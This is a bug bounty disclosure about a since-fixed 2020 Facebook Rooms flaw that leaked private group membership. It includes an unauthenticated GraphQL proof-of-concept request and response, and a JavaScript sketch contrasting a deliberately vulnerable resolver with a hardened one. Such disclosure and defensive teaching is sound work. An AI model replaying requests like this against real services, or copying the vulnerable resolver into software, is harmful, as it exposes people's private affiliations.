Disclosing Private Group Members via Facebook Rooms
🧾 Description
In September 2020, a vulnerability was discovered in Facebook’s Rooms feature inside Groups that allowed attackers to disclose members of private groups through unauthenticated GraphQL requests. By capturing or guessing the room_id, an attacker could access sensitive data revealing group membership and user identities.
⚙️ Steps to Reproduce
- A user creates a Room inside a private group.
- The room_id is exposed in the GraphQL response.
- The attacker captures or guesses the room_id.
- The attacker sends an unauthenticated GraphQL request:
Request:
POST /api/graphql/ HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close

&doc_id=3147738971987452&variables={"room_link":"{room_id}"}
Response:
{
  "data": {
    "link": {
      "admin_ids": ["123456789"],
      "link_owner": {
        "__typename": "User",
        "short_name": "UserA",
        "id": "123456789"
      },
      "link_surface": "GROUP",
      "link_container": {
        "__typename": "Group",
        "id": "987654321"
      }
    }
  }
}
Key Points:
- admin_ids → reveals the user ID of the room creator.
- link_owner → confirms the user identity.
- link_container.id → reveals the private group ID.
These fields confirm the target’s membership in the private group.
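The missing check behind this disclosure, sketched as an added example (not Facebook's code or its actual fix; the resolver names, in-memory stores and ids are hypothetical and constructed): a resolver that answers on room_link alone, next to one that requires an authenticated viewer who is a member of the private group and returns the same null for unknown and forbidden rooms.

```javascript
// Constructed sample data; every name here is hypothetical.
const rooms = new Map([
  ["room-abc", { ownerId: "123456789", adminIds: ["123456789"],
                 surface: "GROUP", groupId: "987654321" }],
]);
const groups = new Map([
  ["987654321", { privacy: "PRIVATE", members: new Set(["123456789", "555"]) }],
]);

// Shape the room record like the "link" object in the response above.
function toLink(room) {
  return {
    admin_ids: room.adminIds,
    link_owner: { __typename: "User", id: room.ownerId },
    link_surface: room.surface,
    link_container: { __typename: "Group", id: room.groupId },
  };
}

// Vulnerable shape: resolves purely on room_link and never consults the viewer.
function resolveLinkVulnerable(roomLink, _viewer) {
  const room = rooms.get(roomLink);
  return room ? toLink(room) : null;
}

// Hardened shape: the viewer must be authenticated and, for a room hosted in
// a private group, a member of that group. Unknown and forbidden rooms both
// yield null, so the response cannot be used to test guessed ids.
function resolveLinkHardened(roomLink, viewer) {
  const room = rooms.get(roomLink);
  if (!room || !viewer || !viewer.id) return null;
  if (room.surface === "GROUP") {
    const group = groups.get(room.groupId);
    if (!group) return null; // fail closed when the container cannot be loaded
    if (group.privacy === "PRIVATE" && !group.members.has(viewer.id)) return null;
  }
  return toLink(room);
}
```

Running both resolvers with a null viewer in a regression test catches any reintroduction of the unauthenticated path.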
Impact
- Membership Disclosure: Attackers can confirm which users belong to private groups.
Timeline
- Reported: September 15, 2020
- Triaged: September 22, 2020
- Fixed: September 29, 2020
- Reward: October 1, 2020 — $1,500
This post is licensed under CC BY 4.0 by the author.